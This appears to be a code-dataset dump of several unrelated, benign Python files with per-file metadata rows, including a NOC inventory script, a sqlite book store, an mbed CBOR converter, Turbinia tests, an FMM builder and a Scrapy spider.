#!/usr/bin/env python3
import re
with open("input.txt") as f:
content = f.read().strip()
ans = ""
i = 0
while i < len(content):
if content[i] == "(":
end = content[i:].find(")") + i
instr = content[i+1:end]
chars, times = map(int, content[i+1:end].split("x"))
to_copy = content[end+1:end+1+chars]
ans += times * to_copy
i = end + 1 + chars
else:
ans += content[i]
i += 1
print(len(ans))
| 20.304348
| 60
| 0.509636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 44
| 0.094218
|
4255be118dbe243d9d0c4b4eac0548f7377725a0
| 2,825
|
py
|
Python
|
sa/profiles/Alcatel/AOS/get_inventory.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 84
|
2017-10-22T11:01:39.000Z
|
2022-02-27T03:43:48.000Z
|
sa/profiles/Alcatel/AOS/get_inventory.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 22
|
2017-12-11T07:21:56.000Z
|
2021-09-23T02:53:50.000Z
|
sa/profiles/Alcatel/AOS/get_inventory.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 23
|
2017-12-06T06:59:52.000Z
|
2022-02-24T00:02:25.000Z
|
# ----------------------------------------------------------------------
# Alcatel.AOS.get_inventory
# ----------------------------------------------------------------------
# Copyright (C) 2007-2014 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinventory import IGetInventory
class Script(BaseScript):
name = "Alcatel.AOS.get_inventory"
interface = IGetInventory
rx_ni = re.compile(
r"^\s+GBIC\s+(?P<int_number>\d+)\n"
r"\s+Manufacturer Name:\s+(?P<vendor>\S+)(|\s+),\n"
r"^\s+Part Number:\s+(?P<part_number>\S+)(|\s+),\n"
r"^\s+Hardware Revision:\s+(|(?P<hw_rev>\S+))(|\s+),\n"
r"^\s+Serial Number:\s+(?P<serial>\S+)(|\s+)(|\s+),\n",
re.IGNORECASE | re.MULTILINE | re.DOTALL,
)
def execute(self):
objects = []
# Chassis info
p = self.scripts.get_version()
objects += [
{
"type": "CHASSIS",
"number": None,
"vendor": "ALU",
"serial": p["attributes"].get("Serial Number"),
"description": "%s %s" % (p["vendor"], p["platform"]),
"part_no": p["platform"],
"revision": p["attributes"].get("HW version"),
"builtin": False,
}
]
# Transiver Detected
iface = self.cli("show ni")
for match in self.rx_ni.finditer(iface):
number = match.group("int_number")
# type = match.group("int")
# vendor = match.group("vendor")
serial = match.group("serial")
hw_rev = match.group("hw_rev")
if not hw_rev:
hw_rev = "None"
part_no = match.group("part_number")
if "XFP-10G-LR" in part_no:
part = "NoName | Transceiver | 10G | XFP LR"
elif "SFP-LX" in part_no:
part = "NoName | Transceiver | 1G | SFP LX"
elif "SFP-LH" in part_no:
part = "NoName | Transceiver | 1G | SFP LH"
elif "GLC-BX" in part_no:
part = "Cisco | Transceiver | 1G | GLC-BX-D"
else:
part = "NoName | Transceiver | 1G | SFP SX"
objects += [
{
"type": "XCVR",
"number": number,
"vendor": "NONAME",
"serial": serial,
"description": "SFP Transceiver " + part_no,
"part_no": [part],
"revision": hw_rev,
"builtin": False,
}
]
return objects
| 36.217949
| 72
| 0.43469
| 2,362
| 0.836106
| 0
| 0
| 0
| 0
| 0
| 0
| 1,262
| 0.446726
|
42569d1c317bd48e4f4e7021e87396555e651ced
| 1,276
|
py
|
Python
|
db_conn.py
|
achhetr/Library-book-store-app
|
a85e9a26dba48119ce52abb5ee8219528e06ac30
|
[
"MIT"
] | null | null | null |
db_conn.py
|
achhetr/Library-book-store-app
|
a85e9a26dba48119ce52abb5ee8219528e06ac30
|
[
"MIT"
] | null | null | null |
db_conn.py
|
achhetr/Library-book-store-app
|
a85e9a26dba48119ce52abb5ee8219528e06ac30
|
[
"MIT"
] | null | null | null |
import sqlite3
class Database:
# create book always if not exists
def __init__(self,db):
self.conn = sqlite3.connect(db)
self.cur = self.conn.execute("CREATE TABLE IF NOT EXISTS book (id INTEGER PRIMARY KEY, " +
"title TEXT, author TEXT, year INTEGER, isbn INTEGER)")
self.conn.commit()
def insert(self,title,author,year,isbn):
self.cur.execute("INSERT INTO book VALUES (NULL,?,?,?,?)",(title,author,year,isbn))
self.conn.commit()
def view(self):
self.cur.execute("SELECT * FROM book")
rows = self.cur.fetchall()
return rows
def search(self,title="",author="",year="",isbn=""):
self.cur.execute("SELECT * FROM book WHERE title=? OR author=? " +
"OR year=? OR isbn=?",(title,author,year,isbn))
rows = self.cur.fetchall()
return rows
def delete(self,id):
self.cur.execute("DELETE FROM book WHERE id=?",(id,))
self.conn.commit()
def update(self,id,title,author,year,isbn):
self.cur.execute("UPDATE book SET title=?, author=?, " +
"year=?,isbn=? WHERE id=?", (title,author,year,isbn,id))
self.conn.commit()
def __del__(self):
self.conn.close()
| 33.578947
| 98
| 0.579937
| 1,260
| 0.987461
| 0
| 0
| 0
| 0
| 0
| 0
| 375
| 0.293887
|
4258b13ddf592d8967b4cf56eb4a465b00010bc4
| 5,286
|
py
|
Python
|
edge-tool/cbor_converter.py
|
hckim-kornic/mbed-edge-kornic
|
b83ea92066fae7c274777aa27494d5524c577c12
|
[
"Apache-2.0"
] | null | null | null |
edge-tool/cbor_converter.py
|
hckim-kornic/mbed-edge-kornic
|
b83ea92066fae7c274777aa27494d5524c577c12
|
[
"Apache-2.0"
] | null | null | null |
edge-tool/cbor_converter.py
|
hckim-kornic/mbed-edge-kornic
|
b83ea92066fae7c274777aa27494d5524c577c12
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright 2018 ARM Ltd.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
import os
import cbor2
import struct
from pyclibrary import CParser
from collections import namedtuple
CERTIFICATE_KEYS = ('MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_CERTIFICATE',
'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_ROOT_CA_CERTIFICATE',
'arm_uc_default_certificate')
KEY_KEYS = ('MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_PRIVATE_KEY')
UPDATE_KEYS = ('arm_uc_default_certificate',
'arm_uc_class_id',
'arm_uc_vendor_id')
KEY_MAP = {
'MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_CERTIFICATE': 'mbed.BootstrapDeviceCert',
'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_ROOT_CA_CERTIFICATE': 'mbed.BootstrapServerCACert',
'MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_PRIVATE_KEY': 'mbed.BootstrapDevicePrivateKey',
'MBED_CLOUD_DEV_BOOTSTRAP_ENDPOINT_NAME': 'mbed.EndpointName',
'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_URI': 'mbed.BootstrapServerURI',
'MBED_CLOUD_DEV_ACCOUNT_ID': 'mbed.AccountID',
'MBED_CLOUD_DEV_MANUFACTURER': 'mbed.Manufacturer',
'MBED_CLOUD_DEV_MODEL_NUMBER': 'mbed.ModelNumber',
'MBED_CLOUD_DEV_SERIAL_NUMBER': 'mbed.SerialNumber',
'MBED_CLOUD_DEV_DEVICE_TYPE': 'mbed.DeviceType',
'MBED_CLOUD_DEV_HARDWARE_VERSION': 'mbed.HardwareVersion',
'MBED_CLOUD_DEV_MEMORY_TOTAL_KB': 'mbed.MemoryTotalKB',
'arm_uc_default_certificate': 'mbed.UpdateAuthCert',
'arm_uc_class_id': 'mbed.ClassId',
'arm_uc_vendor_id': 'mbed.VendorId'
}
ConfigParam = namedtuple('ConfigParam', ['Data', 'Name'])
Certificate = namedtuple('Certificate', ['Data', 'Format', 'Name'])
Key = namedtuple('Key', ['Data', 'Format', 'Name', 'Type'])
class CBORConverter():
def __init__(self, development_certificate, update_resource, cbor_file):
self.development_certificate = development_certificate
self.update_resource = update_resource
self.cbor_file = cbor_file
def __check_file_exists(self, path):
if not os.path.isfile(path):
print("File '%s' does not exist.")
return False
return True
def parse_c_file(self):
if not self.__check_file_exists(self.development_certificate) or \
not self.__check_file_exists(self.update_resource):
return None
values = {}
values.update(CParser([self.development_certificate]).defs.get('values'))
values.update(CParser([self.update_resource],
macros={
'MBED_CLOUD_DEV_UPDATE_ID' : 1,
'MBED_CLOUD_DEV_UPDATE_CERT' : 1
}).defs.get('values'))
return values
def create_cbor_data(self, vars):
cbor_data = {'Certificates': [],
'Keys' : [],
'ConfigParams': [],
'SchemeVersion': '0.0.1'}
use_bootstrap = 1 if 'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_URI' in vars.keys() else 0
cbor_data['ConfigParams'].append(ConfigParam(use_bootstrap, 'mbed.UseBootstrap')._asdict())
for key in vars.keys():
var = vars.get(key)
cbor_var_key = KEY_MAP.get(key, None)
if cbor_var_key:
if key in CERTIFICATE_KEYS:
byte_data = struct.pack('%sB' % len(var), *var);
certificate = Certificate(byte_data, 'der', cbor_var_key)._asdict()
cbor_data['Certificates'].append(certificate)
elif key in KEY_KEYS:
byte_data = struct.pack('%sB' % len(var), *var);
private_key = Key(byte_data, 'der', cbor_var_key, 'ECCPrivate')._asdict()
cbor_data['Keys'].append(private_key)
elif key in UPDATE_KEYS:
byte_data = struct.pack('%sB' % len(var), *var)
config_param = ConfigParam(byte_data, cbor_var_key)._asdict()
cbor_data['ConfigParams'].append(config_param)
else:
config_param = ConfigParam(var, cbor_var_key)._asdict()
cbor_data['ConfigParams'].append(config_param)
else:
print("Key %s not in KEY_MAP." % key)
return cbor_data
def convert_to_cbor(self):
vars = self.parse_c_file()
if not vars:
print("No variables parsed.")
else:
cbor_data = self.create_cbor_data(vars)
with open(self.cbor_file, 'wb') as out_file:
cbor2.dump(cbor_data, out_file)
| 40.661538
| 99
| 0.620885
| 2,896
| 0.547862
| 0
| 0
| 0
| 0
| 0
| 0
| 2,257
| 0.426977
|
4258ec1ee3116d288de649b3f19210bd3aa35e35
| 3,012
|
py
|
Python
|
turbinia/processors/archive_test.py
|
sa3eed3ed/turbinia
|
1eb4db37813f2bd44dcc2c3764e9411f6a2f9d97
|
[
"Apache-2.0"
] | 559
|
2015-09-16T21:55:12.000Z
|
2022-03-28T11:08:11.000Z
|
turbinia/processors/archive_test.py
|
sa3eed3ed/turbinia
|
1eb4db37813f2bd44dcc2c3764e9411f6a2f9d97
|
[
"Apache-2.0"
] | 630
|
2015-09-16T21:53:41.000Z
|
2022-03-25T07:03:32.000Z
|
turbinia/processors/archive_test.py
|
sa3eed3ed/turbinia
|
1eb4db37813f2bd44dcc2c3764e9411f6a2f9d97
|
[
"Apache-2.0"
] | 158
|
2015-12-06T20:39:32.000Z
|
2022-03-13T22:15:01.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the Archive processor to compress and decompress folders."""
from __future__ import unicode_literals
import os
import tarfile
import unittest
import tempfile
from random import randint
from shutil import rmtree
from turbinia.processors import archive
from turbinia import TurbiniaException
class ArchiveProcessorTest(unittest.TestCase):
"""Tests for Archive Processor."""
def setUp(self):
# Setup testing directories/variables.
self.test_files = []
self.base_output_dir = tempfile.mkdtemp(prefix='turbinia-test-local')
self.tmp_files_dir = os.path.join(self.base_output_dir, 'files')
self.tmp_archive = os.path.join(self.base_output_dir, 'files.tar.gz')
if not os.path.exists(self.tmp_files_dir):
os.makedirs(self.tmp_files_dir)
# Generate text files containing random numbers.
file_max = 10
counter = 0
while counter <= file_max:
file_name = 'file{0:s}.txt'.format(str(counter))
file_path = os.path.join(self.tmp_files_dir, file_name)
file_open = open(file_path, 'w+')
rand_nums = [randint(0, 1000) for i in range(50)]
for i in rand_nums:
file_open.write('%s\n' % str(i))
file_open.close()
counter += 1
self.test_files.append(file_name)
archive.CompressDirectory(self.tmp_files_dir)
def tearDown(self):
# Remove testing directory for this unit test.
if os.path.exists(self.base_output_dir):
rmtree(self.base_output_dir)
def test_compressed_dir(self):
"""Tests the compression function"""
# Check if compressed directory matches expected output path.
self.assertEqual(
archive.CompressDirectory(self.tmp_files_dir), self.tmp_archive)
# Check to confirm that the archive is gzip format.
self.assertEqual(tarfile.is_tarfile(self.tmp_archive), True)
# Raise assertion if folder does not exist.
with self.assertRaises(TurbiniaException):
archive.CompressDirectory('blah')
def test_validate_tarfile(self):
"""Tests the validate function used to decompress tar files"""
# Raise exception for file that does not exist.
with self.assertRaises(TurbiniaException):
archive.ValidateTarFile('blah.no')
# Raise exception for a file with unsupported extension.
with self.assertRaises(TurbiniaException):
archive.ValidateTarFile(self.tmp_files_dir)
if __name__ == '__main__':
unittest.main()
| 33.842697
| 74
| 0.729416
| 2,056
| 0.682603
| 0
| 0
| 0
| 0
| 0
| 0
| 1,273
| 0.422643
|
42595d917949c306ffaf79514babf64460ba3c69
| 1,869
|
py
|
Python
|
blog.py
|
BenTimor/SerializationConceptSystem
|
0f85dc32063d270a5564cda3199d84d474e5d83e
|
[
"MIT"
] | 1
|
2020-11-13T22:21:47.000Z
|
2020-11-13T22:21:47.000Z
|
blog.py
|
BenTimor/SerializationConceptSystem
|
0f85dc32063d270a5564cda3199d84d474e5d83e
|
[
"MIT"
] | null | null | null |
blog.py
|
BenTimor/SerializationConceptSystem
|
0f85dc32063d270a5564cda3199d84d474e5d83e
|
[
"MIT"
] | null | null | null |
from utils import database
class Config:
config = None
def __init__(self, users, posts, comments):
self.users = users
self.posts = posts
self.comments = comments
Config.config = self
@staticmethod
def update():
database["concept", True]["config", "WHERE id=1"] = Config.config
@staticmethod
def setup():
try:
Config.config = database["concept", True]["config", "WHERE id=1"][0][0]
except:
Config.config = Config([User("Admin", "admin123", True)], [Post("Admin", 0, "Hello World!", "Lorem Ipsum")], {0: [Comment("Admin", "Lorem Ipsum")]})
database["concept", True]["config"] = Config.config
class User:
def __init__(self, name, password, is_admin=False):
self.name = name
self.is_admin = is_admin
self.password = password
@staticmethod
def new_user(name, password, is_admin=False):
Config.config.users.append(User(name, password, is_admin))
Config.update()
@staticmethod
def get_user(name):
for user in Config.config.users:
if user.name == name:
return user
class Post:
def __init__(self, user, id, title, content):
self.user = user
self.id = id
self.title = title
self.content = content
@staticmethod
def new_post(user, title, content):
Config.config.posts.append(Post(user, len(Config.config.posts), title, content))
Config.update()
class Comment:
def __init__(self, user, content):
self.user = user
self.content = content
@staticmethod
def new_comment(post, user, content):
if not Config.config.comments[post]:
Config.config.comments[post] = []
Config.config.comments[post].append(Comment(user, content))
Config.update()
| 29.666667
| 160
| 0.602996
| 1,835
| 0.981808
| 0
| 0
| 1,171
| 0.626538
| 0
| 0
| 146
| 0.078117
|
4259a696e067dbb5b562342c586a116816461462
| 29
|
py
|
Python
|
src/svr/tests/__init__.py
|
yottaawesome/fsnd-project-2
|
7ed478fa945a561a28af06dc8e4492a9fbea510a
|
[
"MIT"
] | 3
|
2019-05-04T12:30:00.000Z
|
2020-05-14T06:28:51.000Z
|
src/svr/tests/__init__.py
|
yottaawesome/fsnd-project-2
|
7ed478fa945a561a28af06dc8e4492a9fbea510a
|
[
"MIT"
] | 1
|
2019-05-05T01:30:37.000Z
|
2019-05-16T02:50:04.000Z
|
src/svr/tests/__init__.py
|
yottaawesome/fsnd-project-2
|
7ed478fa945a561a28af06dc8e4492a9fbea510a
|
[
"MIT"
] | 1
|
2020-03-27T07:12:40.000Z
|
2020-03-27T07:12:40.000Z
|
from .test_db import TestDal
| 14.5
| 28
| 0.827586
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
425afadcb24a0ea23083f2d7fe78d83b6b1403c9
| 971
|
py
|
Python
|
Owner/models.py
|
2000090063/Vehicle_Rental_System-SDP-2-
|
483d811aa239a226607b4bfb262c99da3be017b4
|
[
"MIT"
] | 3
|
2022-03-12T08:27:42.000Z
|
2022-03-17T12:16:16.000Z
|
Owner/models.py
|
2000090063/Vehicle_Rental_System-SDP-2-
|
483d811aa239a226607b4bfb262c99da3be017b4
|
[
"MIT"
] | null | null | null |
Owner/models.py
|
2000090063/Vehicle_Rental_System-SDP-2-
|
483d811aa239a226607b4bfb262c99da3be017b4
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class Owner(models.Model):
Owner_id = models.AutoField
Owner_firstname = models.CharField(max_length=60)
Owner_lastname = models.CharField(max_length=60)
Owner_address = models.CharField(max_length=600)
Owner_email = models.CharField(max_length=100)
Owner_password = models.CharField(max_length=32)
Owner_dob = models.DateField()
Owner_mobileno = models.CharField(max_length=10)
Owner_gender = models.CharField(max_length=15)
Owner_license = models.ImageField(upload_to='img/Owner_License/')
Owner_agency = models.CharField(max_length=100)
Owner_city = models.CharField(max_length=30)
Owner_state = models.CharField(max_length=30)
Owner_country = models.CharField(max_length=30)
Owner_pincode = models.IntegerField()
isOwner = models.BooleanField(default=True)
def __str__(self):
return self.Owner_email + ": " + str(self.Owner_license)
| 42.217391
| 70
| 0.748713
| 914
| 0.941298
| 0
| 0
| 0
| 0
| 0
| 0
| 50
| 0.051493
|
425c5f6cf6cd74314b97f4bcb6721e3f260e8ac7
| 6,548
|
py
|
Python
|
tectosaur/fmm/builder.py
|
jlmaurer/tectosaur
|
7cc5606d814f061395b19754e7a4b6c5e4c236e5
|
[
"MIT"
] | 17
|
2017-06-29T16:48:56.000Z
|
2021-10-03T18:31:41.000Z
|
tectosaur/fmm/builder.py
|
jlmaurer/tectosaur
|
7cc5606d814f061395b19754e7a4b6c5e4c236e5
|
[
"MIT"
] | 4
|
2018-05-29T08:21:13.000Z
|
2021-04-01T01:28:50.000Z
|
tectosaur/fmm/builder.py
|
jlmaurer/tectosaur
|
7cc5606d814f061395b19754e7a4b6c5e4c236e5
|
[
"MIT"
] | 8
|
2019-06-10T22:19:40.000Z
|
2022-01-12T20:55:37.000Z
|
import numpy as np
import tectosaur.util.gpu as gpu
from tectosaur.fmm.c2e import build_c2e
import logging
logger = logging.getLogger(__name__)
def make_tree(m, cfg, max_pts_per_cell):
tri_pts = m[0][m[1]]
centers = np.mean(tri_pts, axis = 1)
pt_dist = tri_pts - centers[:,np.newaxis,:]
Rs = np.max(np.linalg.norm(pt_dist, axis = 2), axis = 1)
tree = cfg.traversal_module.Tree.build(centers, Rs, max_pts_per_cell)
return tree
class FMM:
def __init__(self, obs_tree, obs_m, src_tree, src_m, cfg):
self.cfg = cfg
self.obs_tree = obs_tree
self.obs_m = obs_m
self.src_tree = src_tree
self.src_m = src_m
self.gpu_data = dict()
self.setup_interactions()
self.collect_gpu_ops()
self.setup_output_sizes()
self.params_to_gpu()
self.tree_to_gpu(obs_m, src_m)
self.interactions_to_gpu()
self.d2e_u2e_ops_to_gpu()
def setup_interactions(self):
self.interactions = self.cfg.traversal_module.fmmmm_interactions(
self.obs_tree, self.src_tree, self.cfg.inner_r, self.cfg.outer_r,
self.cfg.order, self.cfg.treecode
)
def collect_gpu_ops(self):
self.gpu_ops = dict()
for a in ['s', 'p']:
for b in ['s', 'p']:
name = a + '2' + b
self.gpu_ops[name] = getattr(self.cfg.gpu_module, name + '_' + self.cfg.K.name)
self.gpu_ops['c2e1'] = self.cfg.gpu_module.c2e_kernel1
self.gpu_ops['c2e2'] = self.cfg.gpu_module.c2e_kernel2
def setup_output_sizes(self):
self.n_surf_tris = self.cfg.surf[1].shape[0]
self.n_surf_dofs = self.n_surf_tris * 9
self.n_multipoles = self.n_surf_dofs * self.src_tree.n_nodes
self.n_locals = self.n_surf_dofs * self.obs_tree.n_nodes
self.n_input = self.src_m[1].shape[0] * 9
self.n_output = self.obs_m[1].shape[0] * 9
def float_gpu(self, arr):
return gpu.to_gpu(arr, self.cfg.float_type)
def int_gpu(self, arr):
return gpu.to_gpu(arr, np.int32)
def params_to_gpu(self):
self.gpu_data['params'] = self.float_gpu(self.cfg.params)
def tree_to_gpu(self, obs_m, src_m):
gd = self.gpu_data
gd['obs_pts'] = self.float_gpu(obs_m[0])
gd['obs_tris'] = self.int_gpu(obs_m[1][self.obs_tree.orig_idxs])
gd['src_pts'] = self.float_gpu(src_m[0])
gd['src_tris'] = self.int_gpu(src_m[1][self.src_tree.orig_idxs])
obs_tree_nodes = self.obs_tree.nodes
src_tree_nodes = self.src_tree.nodes
for name, tree in [('src', self.src_tree), ('obs', self.obs_tree)]:
gd[name + '_n_C'] = self.float_gpu(tree.node_centers)
gd[name + '_n_R'] = self.float_gpu(tree.node_Rs)
for name, tree in [('src', src_tree_nodes), ('obs', obs_tree_nodes)]:
gd[name + '_n_start'] = self.int_gpu(np.array([n.start for n in tree]))
gd[name + '_n_end'] = self.int_gpu(np.array([n.end for n in tree]))
def interactions_to_gpu(self):
op_names = ['p2p', 'p2m', 'p2l', 'm2p', 'm2m', 'm2l', 'l2p', 'l2l']
for name in op_names:
op = getattr(self.interactions, name)
if type(op) is list:
for i, op_level in enumerate(op):
self.op_to_gpu(name + str(i), op_level)
else:
self.op_to_gpu(name, op)
def op_to_gpu(self, name, op):
for data_name in ['obs_n_idxs', 'obs_src_starts', 'src_n_idxs']:
self.gpu_data[name + '_' + data_name] = self.int_gpu(
np.array(getattr(op, data_name), copy = False)
)
def d2e_u2e_ops_to_gpu(self):
gd = self.gpu_data
gd['u2e_obs_n_idxs'] = [
self.int_gpu(np.array(self.interactions.u2e[level].obs_n_idxs, copy = False))
for level in range(len(self.interactions.m2m))
]
gd['d2e_obs_n_idxs'] = [
self.int_gpu(np.array(self.interactions.d2e[level].obs_n_idxs, copy = False))
for level in range(len(self.interactions.l2l))
]
u2e_UT, u2e_E, u2e_V = build_c2e(
self.src_tree, self.cfg.outer_r, self.cfg.inner_r, self.cfg
)
gd['u2e_V'] = self.float_gpu(u2e_V)
gd['u2e_E'] = self.float_gpu(u2e_E)
gd['u2e_UT'] = self.float_gpu(u2e_UT)
d2e_UT, d2e_E, d2e_V = build_c2e(
self.obs_tree, self.cfg.inner_r, self.cfg.outer_r, self.cfg
)
gd['d2e_V'] = self.float_gpu(d2e_V)
gd['d2e_E'] = self.float_gpu(d2e_E)
gd['d2e_UT'] = self.float_gpu(d2e_UT)
def to_tree(self, input_orig):
orig_idxs = np.array(self.src_tree.orig_idxs)
input_orig = input_orig.reshape((-1,9))
return input_orig[orig_idxs,:].flatten()
def to_orig(self, output_tree):
orig_idxs = np.array(self.obs_tree.orig_idxs)
output_tree = output_tree.reshape((-1, 9))
output_orig = np.empty_like(output_tree)
output_orig[orig_idxs,:] = output_tree
return output_orig.flatten()
def report_interactions(fmm_obj):
dim = fmm_obj.obs_m[1].shape[1]
order = fmm_obj.cfg.surf[1].shape[0]
def count_interactions(op_name, op):
obs_surf = False if op_name[2] == 'p' else True
src_surf = False if op_name[0] == 'p' else True
return fmm_obj.cfg.traversal_module.count_interactions(
op, fmm_obj.obs_tree, fmm_obj.src_tree,
obs_surf, src_surf, order
)
n_obs_tris = fmm_obj.obs_m[1].shape[0]
n_src_tris = fmm_obj.src_m[1].shape[0]
level_ops = ['m2m', 'l2l']
ops = ['p2m', 'p2l', 'm2l', 'p2p', 'm2p', 'l2p']
interactions = dict()
for op_name in ops:
op = getattr(fmm_obj.interactions, op_name)
interactions[op_name] = count_interactions(op_name, op)
for op_name in level_ops:
ops = getattr(fmm_obj.interactions, op_name)
for op in ops:
if op_name not in interactions:
interactions[op_name] = 0
interactions[op_name] += count_interactions(op_name, op)
direct_i = n_obs_tris * n_src_tris
fmm_i = sum([v for k,v in interactions.items()])
logger.info('compression factor: ' + str(fmm_i / direct_i))
logger.info('# obs tris: ' + str(n_obs_tris))
logger.info('# src tris: ' + str(n_src_tris))
logger.info('total tree interactions: %e' % fmm_i)
for k, v in interactions.items():
logger.info('total %s interactions: %e' % (k, v))
| 36.786517
| 95
| 0.609652
| 4,655
| 0.710904
| 0
| 0
| 0
| 0
| 0
| 0
| 437
| 0.066738
|
425d43c4429c4fecedfff11a5de11c9d121390a6
| 2,553
|
py
|
Python
|
fabio/test/codecs/test_mpaimage.py
|
picca/fabio
|
bc3aae330bef6e1c983007562157edfe6d7daf91
|
[
"Apache-2.0"
] | null | null | null |
fabio/test/codecs/test_mpaimage.py
|
picca/fabio
|
bc3aae330bef6e1c983007562157edfe6d7daf91
|
[
"Apache-2.0"
] | 2
|
2019-04-24T13:43:41.000Z
|
2019-06-13T08:54:02.000Z
|
fabio/test/codecs/test_mpaimage.py
|
boesecke/fabio
|
11350e445a6def4d02c6860aea3ae7f36652af6a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Project: Fable Input Output
# https://github.com/silx-kit/fabio
#
# Copyright (C) European Synchrotron Radiation Facility, Grenoble, France
#
# Principal author: Jérôme Kieffer (Jerome.Kieffer@ESRF.eu)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Multiwire Unit tests"""
from __future__ import print_function, with_statement, division, absolute_import
import unittest
import logging
logger = logging.getLogger(__name__)
import fabio
from ..utilstest import UtilsTest
class TestMpa(unittest.TestCase):
"""
Test classe for multiwire (mpa) images
"""
TESTIMAGES = [
# filename dim1 dim2 min max mean stddev
("mpa_test.mpa", 1024, 1024, 0, 1295, 0.8590, 18.9393),
]
def test_read(self):
"""
Test the reading of multiwire images
"""
for imageData in self.TESTIMAGES:
name, dim1, dim2, mini, maxi, mean, stddev = imageData
shape = dim2, dim1
logger.debug("Processing: %s" % name)
path = UtilsTest.getimage(name + ".bz2")[:-4]
obj = fabio.mpaimage.MpaImage()
obj.read(path)
self.assertAlmostEqual(mini, obj.getmin(), 2, "getmin [%s,%s]" % (mini, obj.getmin()))
self.assertAlmostEqual(maxi, obj.getmax(), 2, "getmax [%s,%s]" % (maxi, obj.getmax()))
self.assertAlmostEqual(mean, obj.getmean(), 2, "getmean [%s,%s]" % (mean, obj.getmean()))
self.assertAlmostEqual(stddev, obj.getstddev(), 2, "getstddev [%s,%s]" % (stddev, obj.getstddev()))
self.assertEqual(shape, obj.shape)
def suite():
loadTests = unittest.defaultTestLoader.loadTestsFromTestCase
testsuite = unittest.TestSuite()
testsuite.addTest(loadTests(TestMpa))
return testsuite
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
| 34.04
| 111
| 0.653741
| 1,105
| 0.432485
| 0
| 0
| 0
| 0
| 0
| 0
| 1,220
| 0.477495
|
425dd97c671323bb5d6b53095ab3886bfc7da465
| 1,064
|
py
|
Python
|
currencySpider.py
|
cloud322/helloScrap
|
6313c5b99bce04c6a78a5dfb2ec910c73a33add3
|
[
"Apache-2.0"
] | null | null | null |
currencySpider.py
|
cloud322/helloScrap
|
6313c5b99bce04c6a78a5dfb2ec910c73a33add3
|
[
"Apache-2.0"
] | null | null | null |
currencySpider.py
|
cloud322/helloScrap
|
6313c5b99bce04c6a78a5dfb2ec910c73a33add3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import scrapy
import codecs
import sys
#리눅스상에서 utf-8 로 파일에 내용을 기록하려면 시스템 기본 인코딩으 ㄹutf-8 로 설정해야함
reload(sys)
sys.setdefaultencoding('utf8')
# scrapy 에서 spider 는 crawling/scrapping을 담당하는 핵심부분
#crawling/scrapping 절차에 대한 정의를 하는 부분
class CurrSpider(scrapy.Spider):
name = 'currSpider'
start_urls = ['http://finance.naver.com/marketindex/?tabSel=exchange#tab_section']
def parse(self, response):
ranks = response.css('span.blind::text').extract()
titles = response.css('span.value::text').extract()
with codecs.open('curr.csv','w','utf-8') as f:
# 처리결과 저장하기위해
# movierank.csv 라는 이름으로 쓰기 모드로 open
# for i in range(0,4):
# rank = ranks[i].replace('\r\n', ' ')
# rank = ''.join(rank.split())
print(ranks)
# title = titles[i].replace('\r\n', ' ')
# title = title.strip().encode('utf-8')
print(titles)
f.write('%s,%s\n' % (ranks, titles))
f.close()
| 28
| 86
| 0.56015
| 853
| 0.698036
| 0
| 0
| 0
| 0
| 0
| 0
| 698
| 0.571195
|
425f6d304bf8b5a8fd1c2a47d2f7c554468160b1
| 1,812
|
py
|
Python
|
tests/test_sanity_check/test_similar_columns.py
|
thibaultbl/feature_engine
|
08374227e7a88b67ee64b64f22e4f30390df9253
|
[
"BSD-3-Clause"
] | 1
|
2021-09-08T08:54:56.000Z
|
2021-09-08T08:54:56.000Z
|
tests/test_sanity_check/test_similar_columns.py
|
thibaultbl/feature_engine
|
08374227e7a88b67ee64b64f22e4f30390df9253
|
[
"BSD-3-Clause"
] | 1
|
2021-09-10T08:54:51.000Z
|
2021-09-10T08:54:51.000Z
|
tests/test_sanity_check/test_similar_columns.py
